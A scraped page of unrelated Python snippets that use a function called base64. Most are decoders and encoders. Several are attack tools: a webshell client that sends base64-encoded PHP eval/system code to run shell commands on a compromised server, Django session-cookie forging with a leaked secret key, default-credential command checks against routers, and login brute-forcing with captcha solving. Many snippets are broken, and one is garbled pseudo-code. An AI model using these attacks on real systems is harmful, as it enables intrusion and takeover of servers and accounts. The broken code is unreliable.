Beispiel #1
0
def main_menu():
    print("Please enter your choice")
    print("(1) Binary")
    print("01110100 01100101 01110011 01110100")
    print("(2) Hexdecimal")
    print("74 65 73 74 20 74 65 78 74 DA")
    print("(3) Ceaser Shift")
    print("grfg zrffntr")
    print("(4) Base64")
    print("dGVzdA==")
    print("(5) Reverse")
    print("racecar")

    choice = input("> ")

    if "1" in choice:
        binary()
    if "2" in choice:
        hexdecimal()
    if "3" in choice:
        shift()
    if "4" in choice:
        base64()
    if "5" in choice:
        reverse()
    else:
        main_menu()
Beispiel #2
0
def send_payload(key, addr, payload):
    # mostly taken from django
    def base64(s):
        import base64
        return base64.urlsafe_b64encode(s).strip(b'=')

    def salted_hmac(salt, value, secret):
        key = hashlib.sha1((salt + secret).encode('utf-8')).digest()
        return hmac(key, msg=value, digestmod=hashlib.sha1).digest()

    import time, baseconv
    timestamp = baseconv.base62.encode(str(int(time.time())))
    data = base64(payload) + ":" + timestamp
    mac = base64(
        salted_hmac('django.contrib.sessions.backends.signed_cookiessigner',
                    data, key))  # default salt by django
    s = '%(payload)s:%(time)s:%(mac)s' % {
        'payload': base64(payload),
        'time': timestamp,
        'mac': mac
    }

    try:
        print requests.get(addr, cookies={'sessionid': s}, timeout=15)
    except:
        print ' - Could not connect to server. Aborting.'
def brute_force(cipher):
    base64(cipher)
    base32(cipher)
    ceaser(cipher)
    morse_code(cipher)
    rot47(cipher)
    t9_mappings(cipher)
    Phonetic_name(cipher)
Beispiel #4
0
def main():
    print("\n---------------------------Decoder---------------------------\n")
    for case in switch(
            input('''(1)Base64\t(2)Caesar Cipher \nCtrl+C to Stop This\n''')):
        if case('1'):
            base64()
            break
        if case('2'):
            caesar_cipher()
            break
        if case('3'):
            import hashlib
            import sys
            import time

            def timing(f):
                def wrap(*args):
                    time1 = time.time()
                    ret = f(*args)
                    time2 = time.time()
                    print("%s Time: %0.3f s" %
                          (f.func_name, float(time2 - time1)))
                    return ret

                return wrap

            @timing
            def decryptMD5(testHash):
                s = []
                while True:
                    m = hashlib.md5()
                    for c in s:
                        m.update(chr(c).encode("utf-8"))
                    hash = m.hexdigest()
                    if hash == testHash:
                        return ''.join([chr(c) for c in s])
                    wrapped = True
                    for i in range(0, len(s)):
                        s[i] = (s[i] + 1) % 256
                        if s[i] != 0:
                            wrapped = False
                            break
                    if wrapped:
                        s.append(0)

            print(
                decryptMD5("9743a66f914cc249efca164485a19c5c".encode("utf-8")))
            break
        if case():  # default, could also just omit condition or 'if True'
            print("Error!")
            main()
Beispiel #5
0
 def generatePassword(self):
     #Take de parameters
     username = str(self.ui.username.text())
     domain = str(self.ui.domain.text())
     master_password = str(self.ui.master_password.text())
     
     #Check if any is empty
     if username == "" or domain == "" or master_password =="":
         self.ui.generated_password.setText("Please, complete all fields");
     else:
         text = username +':'+ domain + '@' + master_password
         gen = hashlib.sha256(text)
         text_cod = gen.hexdigest()
         
         
         if self.ui.ascii85.isChecked():
             #print "ASCI85"#:J3Y'P6M
             text_cod = ascii85(text_cod)
         else:
             #print "BASE64"#omKEW8js
             text_cod = base64(text_cod)
         value = self.ui.selected_size.value()
         text_cod = text_cod[:value]
         self.ui.generated_password.setText("")
         self.ui.generated_password.setText(text_cod)
def uploadCaptcha(self, captchaImgName):
    headers = {
        'Accept':
        'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
        'Accept-Encoding': 'gzip, deflate',
        'User-Agent':
        'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0',
        'Content-Type':
        'multipart/form-data; boundary=---------------------------227973204131376',
        'Connection': 'keep-alive',
        'Host': 'v2api.jsdama.com',
        'Upgrade-Insecure-Requests': '1'
    }

    data = dict(softwareId="",
                softwareSecret="",
                username="",
                password="",
                captchaData=base64(captchaImgName),
                captchaType=1001,
                captchaMinLength=0,
                captchaMaxLength=0,
                workerTipsId=0)

    api_url = 'https://v2-api.jsdama.com/upload'

    captcha_dict = json.loads(
        requests.post(url=api_url, data=data, headers=headers, verify=False))

    return captcha_dict['recognition']
Beispiel #7
0
def php_horse(url,parameter,header,pa=""):
	if pa=="":
		file_path=path(url,parameter,header)
	else:
		file_path=pa
	cmd=str(input("\n["+str(file_path)+"]$ "))
	if cmd == "":
		return pa
	elif cmd =="exit":
		return "exit"
	#za=@eval(base64_decode($_POST[z0]));
	zaphp="@eval(base64_decode(\"QGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbejBdKSk7\"));"
	#zbphp为命令执行代码
	zbphp="QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztkaWUoKTs="
	#linux_shell=/bin/sh
	linux_shell="L2Jpbi9zaA=="
	command="cd \""+str(file_path)+"\";"+str(cmd)+";pwd;"
	command=base64(command)
	#tphp为base64编码后的字符串
	r=requests.post(url,data={parameter:zaphp,'z0':zbphp,'z1':linux_shell,'z2':command.decode('utf-8')},headers=header)
	result=regularex(r.text)
	#print(result)
	for i in range(len(result)-3):
		if result[i] =='':
			continue
		print (result[i])
	return result[-3]
    def verify(self):
        self.target = self.target.rstrip(
            '/') + '/' + (self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # ref: http://www.wooyun.org/bugs/wooyun-2010-0148657
            hh = hackhttp.hackhttp()
            users = ['manager:manager', 'guest:guest']
            for user in users:
                cookie = "c_name=; hardtype=NBR1500G; web-coding=gb2312; currentURL=; auth=" + \
                    base64(user) + "; user=admin"
                posturl = "/WEB_VMS/LEVEL15/"
                command = "show version"
                post = "command=" + command + "&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant."
                target = self.target + posturl
                code, head, res, errcode, _ = hh.http(
                    target, post=post, cookie=cookie)
                # print res
                if code == 200 and "System software version" in res:
                    #security_hole(user +" | " + arg)
                    self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
                        target=self.target, name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
Beispiel #9
0
def send_django(key, add, payload):
    def base64(s): #taken from django
        import base64
        return base64.urlsafe_b64encode(s).strip(b'=')

    def salted_hmac(salt, value, secret): #taken from django
        key = hashlib.sha1((salt + secret).encode('utf-8')).digest()
        return hmac(key, msg=value, digestmod=hashlib.sha1).digest()

    import time
    import baseconv #taken from django

    timestamp = baseconv.base62.encode(str(int(time.time())))
    data = base64(payload)+":"+timestamp
    mac = base64(salted_hmac('django.contrib.sessions.backends.signed_cookiessigner', data, key)) #default salt by django
    s = '%(payload)s:%(time)s:%(mac)s'%{'payload':base64(payload), 'time':timestamp, 'mac':mac}
    print requests.get(add, cookies={'sessionid':s})
Beispiel #10
0
def crypt():
    print "[1]-BASE64"
    print "[2]-MD5"
    print "[3]-SHA1"
    print "[4]-SHA224"
    print "[5]-SHA256"
    print "[6]-SHA384"
    print "[7]-SHA512"
    ch6 = raw_input("> ")
    if ch6 == '1':
        clear()
        logo()
        base64()
        menu()
    if ch6 == '2':
        clear()
        logo()
        md5()
        menu()
    if ch6 == '3':
        clear()
        logo()
        sha1()
        menu()
    if ch6 == '4':
        clear()
        logo()
        sha224()
        menu()
    if ch6 == '5':
        clear()
        logo()
        sha256()
        menu()
    if ch6 == '6':
        clear()
        logo()
        sha384()
        menu()
    if ch6 == '7':
        clear()
        logo()
        sha512()
        menu()
Beispiel #11
0
def send_payload(key, addr, payload):
    # mostly taken from django
    def base64(s):
        import base64
        return base64.urlsafe_b64encode(s).strip(b'=')

    def salted_hmac(salt, value, secret):
        key = hashlib.sha1((salt + secret).encode('utf-8')).digest()
        return hmac(key, msg=value, digestmod=hashlib.sha1).digest()

    import time, baseconv
    timestamp = baseconv.base62.encode(str(int(time.time())))
    data = base64(payload)+":"+timestamp
    mac = base64(salted_hmac('django.contrib.sessions.backends.signed_cookiessigner', data, key)) # default salt by django
    s = '%(payload)s:%(time)s:%(mac)s'%{'payload':base64(payload), 'time':timestamp, 'mac':mac}

    try:
        print requests.get(addr, cookies={'sessionid':s}, timeout=15)
    except:
        print ' - Could not connect to server. Aborting.'
Beispiel #12
0
def getEncParams(params,timestamp,_deskey):
    token=md5(md5(params)+md5(timestamp))
    _params = base64(utf168(strenc(params,_deskey)))
    
    #返回字典型
    data={'timestamp':timestamp,
        'token':token,
        'params':_params}
    #返回字符串型
    _params = urllib.parse.urlencode(data).encode('GBK')
    return _params
Beispiel #13
0
    def command(self):
        self.__dict__.update(self.options.__dict__)

        if self.args:  self.name = self.args[0]

        package = self.name.lower()
        package = beginning_letter.sub("", package)
        package = valid_only.sub("", package)
        if not self.package:
            while not self.package:
                self.package = raw_input(
                    "Enter package name [%s]: " % package).strip() or package

        env = pkg_resources.Environment()
        if self.name.lower() in env:
            print 'The name "%s" is already in use by' % self.name,
            for dist in env[self.name]:
                print dist
                return

        import imp
        try:
            if imp.find_module(self.package):
                print 'The package name "%s" is already in use' % self.package
                return
        except ImportError:
            pass

        if os.path.exists(self.name):
            print 'A directory called "%s" already exists. Exiting.' % self.name
            return


        self.cookiesecret = None
        try:
            import uuid
            self.cookiesecret = str(uuid.uuid4())
        except ImportError:
            import random
            import base64
            self.cookiesecret = base64.b64encode(base64(random.randrange(2 ** 32))).strip()

        create_command = create_distro.CreateDistroCommand("create")
        cmd_args = []
        for template in self.template.split():
            cmd_args.append("--template=%s" % self.template)
        if self.svn_repository:
            cmd_args.append("--svn-repository=%s" % self.svn_repository)

        cmd_args.append(self.name)
        cmd_args.append("package=%s" % self.package)
        cmd_args.append("cookiesecret=%s" % self.cookiesecret)
        create_command.run(cmd_args)
Beispiel #14
0
	def options(self):
		ircoders.clear()
		ircoders.print_logo()
		ircoders.options()
		getinput = raw_input(cc + " $ ")
		if getinput == "1":
			base64()
		elif getinput  == "2":
			md5()
		elif getinput == "3":
			sha1()
		elif getinput == "4":
			sha224()
		elif getinput == "5":
			sha256()
		elif getinput == "6":
			sha384()
		elif getinput == "7":
			sha512()
		else:
			print cr + "Unknown Input"
			sys.exit()
def encryptedPassword(password,api_key):

    key = encryptionKey(api_key)
    decodedKey = base64.decode(key['encryptionKey']) # DER key for rsa folk

    seq = asn1.DerSequence()
    seq.decode(decodedKey)
    keyPub = RSA.construct( (seq[0], seq[1]) )

    #  roughly translated from
    '''
    asn = pidCrypt.ASN1.decode(pidCryptUtil.toByteArray(decodedKey))
    tree = asn.toHexTree()

    rsa.setPublicKeyFromASN(tree)

    return pidCryptUtil.encodeBase64(pidCryptUtil.convertFromHex(rsa.encrypt(password += '|' + key.timeStamp)))
    '''

    return base64(str(bytearray.fromhex(keyPub.encrypt(password + '|' + key['timestamp'])))) # assumed converting from hex to string
def tryLogin(self, captchaURL, loginURL, username, password):
    headers = {
        'Accept':
        'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
        'Accept-Encoding': 'gzip, deflate',
        'User-Agent':
        'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0',
        'Content-Type':
        'multipart/form-data; boundary=---------------------------227973204131376',
        'Connection': 'keep-alive',
        'Host': 'v2api.jsdama.com',
        'Upgrade-Insecure-Requests': '1'
    }

    valcode = requests.get(captchaURL)
    f = open('captchaCode.png', 'wb')
    f.write(valcode.content)
    f.close()
    code = uploadCaptcha(base64(str(valcode.content)))

    data = {'username': username, 'password': password, 'captcha': code}

    r = requests.post(loginURL,
                      data=data,
                      cookies=requests.utils.dict_from_cookiejar(
                          valcode.cookies),
                      vertify=False)

    isFind = False
    if "failed" in r.content:  # 这里是对应网站的密码验证逻辑
        print('尝试密码', password, '登陆失败')
        isFind = False
    else:
        print(username, '登陆成功', 'password = ', pwd)
        isFind = True
    return isFind
Beispiel #17
0
# base64
def base64(input):
    print(base64.b64decode(input))

#input = input()
input = "hello world"
inputUpper = input.upper()
print("Input:", input)
print()
inputWords = inputUpper.split()

mostCommon = collections.Counter(input.replace(" ", "")).most_common(2)[0][0]
secondMostCommon = collections.Counter(input.replace(" ", "")).most_common(2)[1][0]

if mostCommon is "-" or secondMostCommon is "-":
    morseDecoder(input)
if hasLetters(input) is True and hasNumbers(input) is False:
    rot13(inputUpper)
    caesar(inputUpper)
    null(input)
    rail(inputUpper)
    morseConverter(inputUpper)
    morseEncoder(inputUpper)
    #vigenere(input)
if hasNumbers(input) is True and hasLetters(input) is False:
    polybius(input) # make this one line printed and look nicer
if hasLetters(input) is True and hasNumbers(input) is True:
    #base32(input)
    base64(input)
            triple = src[offset:]
            r = 3 - len(triple)
            triple = triple + '\x00'*r    # 补几个0

        #print(triple, r)
        # 将3个字节看成一个整体转成字节bytes,大端模式
        # abc --> 0x616263
        b = int.from_bytes(triple.encode(), 'big')    # 小端模式为'little'
        print(hex(b))

        # 0110000101100010 01100011    # abc
        # 011000 010110 001001 100011    # 每6位断开
        for i in range(18, -1, -6):
            if i == 18:
                index = b >> i
            else:
                index = b >> i & 0x3F    # 0b0011 1111
            ret.append(alphabet[index])    # 得到base64编码的列表
        # 策略是不管是不是补零,都填满,只有最后一次可能出现补零的
        # 在最后替换掉就是了,代码清晰,而且替换至多2次
        # 在上一个循环中判断 r!=0,效率可能会高些
        for i in range(1, r+1):    # 1到r,补几个0替换几个=
            ret[-i] = 0x3D
    return ret
print(base64(teststr))


# base64实现
import base64
print(base64.b64encode(teststr.encode()))
def get_covid_data():
    url("https://www.worldometers.info/coronavirus/")
    html_data = get_html_data(url)
    bs = base64(html_data.text, "html.parser")
    print(bs)
Beispiel #20
0
      __init__(baseString, shaString, asciiString)

       base64.decode = lines.replace(FILE, str(STRINGS_PATHS))

       shaString.decode = lines.replace(FILE, str(STRINGS_PATHS))

       asciiString.decode = lines.replace(FILE, str(STRINGS_PATHS))


     __init__(self, STRINGS_PATHS)

        sys.inguide == decode:
             editL = win32.dns(convert, uint32, 0) + FILE()
               for editL in base64:
                 try:
                 	EXTENSIONS = base64(sys_platform = '.vb', '.cs', '.il')
                    vbIniciar = ("[>>] Iniciando decode no projeto Vb -> " + (FILE))
               break;
               for editL in shaString:
                 try:
                    EXTENSIONS = shaString(sys_platform = '.vb', '.cs', '.il')
                    csIniciar = ("[>>] Iniciando decode no projeto C-Sharp -> " + (FILE))
               break;
               for iditL in asciiString:
                    EXTENSIONS = asciiString(sys_platform = '.vb', '.cs', '.il')   
                    ilIniciar = ("[>>] Iniciando decode no projeto IL -> " + (FILE))

                else:
                    lbError = ("[>>] Não foi possivel reconhecer a extensão" + sys.exit(1))    

Beispiel #21
0
    return uf


def base64(uf):
    js = execjs.compile('''function en(e){
		var c = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
		e = String(e);
		for (var t, r, o, n, d = e.length % 3, h = "", i = -1, f = e.length - d; ++i < f; )
			t = e.charCodeAt(i) << 16,
			r = e.charCodeAt(++i) << 8,
			o = e.charCodeAt(++i),
			h += c.charAt((n = t + r + o) >> 18 & 63) + c.charAt(n >> 12 & 63) + c.charAt(n >> 6 & 63) + c.charAt(63 & n);
		return 2 == d ? (t = e.charCodeAt(i) << 8,
			r = e.charCodeAt(++i),
			h += c.charAt((n = t + r) >> 10) + c.charAt(n >> 4 & 63) + c.charAt(n << 2 & 63) + "=") : 1 == d && (n = e.charCodeAt(i),
			h += c.charAt(n >> 2) + c.charAt(n << 4 & 63) + "=="),
			h}''')
    bas = js.call('en', uf)
    print("ECdITeCs:" + bas)


if __name__ == "__main__":
    sthahah = Crack()
    crc32 = crc32_js(sthahah)
    hek = hex_js(crc32)
    nstrkey = hek + '#' + sthahah
    uf = doEncrypt(nstrkey)
    print("-ww->\n", uf)
    bas = base64(uf)
    print("--->\n", bas)
Beispiel #22
0
key = Random.new().read(8)
iv = Random.new().read(8)
print("key:")
print(key)
print("iv:")
print(iv)

msg_enc_with_des = DES_encrypt(message, key, iv)
print("mesazhi i enkri me des: ")
print(msg_enc_with_des)

sender_username = sender_username.encode("utf-8")
cipher = base64.b64encode(bytes(receiver_name, 'utf-8'))
cipher = cipher.decode('utf-8')
cipher = cipher + "." + str(base64.b64encode(iv))
cipher = cipher + "." + str(base64.b64encode(key))
cipher = cipher + "." + str(base64.b64encode(msg_enc_with_des))
cipher = cipher + "." + str(base64.b64encode(sender_username))
cipher = cipher + "." + str(base64.b64encode(sign_with_rsa(msg_enc_with_des)))

if (insert_msg_into_db(sender_username, cipher, receiver_name,
                       sender_public_key)):
    print("Mesazhi U Dergua Me Sukses")
else:
    print("Diqka Gabim")
"""
ciphertext =
base64(utf8(<name>)) . base64(<iv>) . base64(rsa(<key>)). base64(des(<message>)) . base64(utf8(<sender>)). 
base64(signature(des(<message>)))
"""
Beispiel #23
0
def audit(arg):
    users = ['manager:manager','guest:guest']
    for user in users:
        cookie = "c_name=; hardtype=NBR1500G; web-coding=gb2312; currentURL=; auth=" + base64(user) +"; user=admin"
        posturl =  "/WEB_VMS/LEVEL15/"
        command = "show version"
        post = "command=" + command +"&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant."
        target = arg + posturl
        code, head, res, errcode, _ = curl.curl2(target,post=post, cookie=cookie)
        # print res
        if code == 200 and "System software version" in res:
            security_hole(user +" | " + arg)


            return arg
Beispiel #24
0
def audit(arg):
    users = ['manager:manager','guest:guest']
    for user in users:
        cookie = "c_name=; hardtype=NBR1500G; web-coding=gb2312; currentURL=; auth=" + base64(user) +"; user=admin"
        posturl =  "/WEB_VMS/LEVEL15/"
        command = "show version"
        post = "command=" + command +"&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant."
        target = arg + posturl
        code, head, res, errcode, _ = curl.curl2(target,post=post, cookie=cookie)
        # print res
        if code == 200 and "System software version" in res:
                security_hole(user +" | " + arg)
                return 0 # 检测出来一个弱口令就退出
Beispiel #25
0
def post_test():
    payload = '[{"uuid":"123123123","imagebase64":"%s","ip":"192.187.980"},{"uuid":"123123123","imagebase64":"%s","ip":"192.187.880"}]' % (
        base64("02.jpg"), base64("3.jpg"))
    r = requests.post('http://localhost/imageprocess', data=payload)
    print(r.text)
Beispiel #26
0
#! /usr/bin/env python2
#  -*- coding: utf-8 -*-
#  author:boo

import requests
import base64
'''
post 请求
'''
# url = 'http://111.198.29.45:45146/?a=1'
# pdata = {'b':'2'}
# r = requests.post(url,data=pdata)
# r.encoding='utf8'
# print(r.text)
'''
 ascll 转字符
'''
# t = (55,56,54,79,115,69,114,116,107,49,50)
# for i in t:
#     print(chr(i),end='')
# print()

base64(UME_STRINGS_PERM)
Beispiel #27
0
def Run_All_Bases():
    global base64
    Cipher_Frame_Destroyer()
    Atbash_Output_Decoding.destroy()
    base32()
    base64()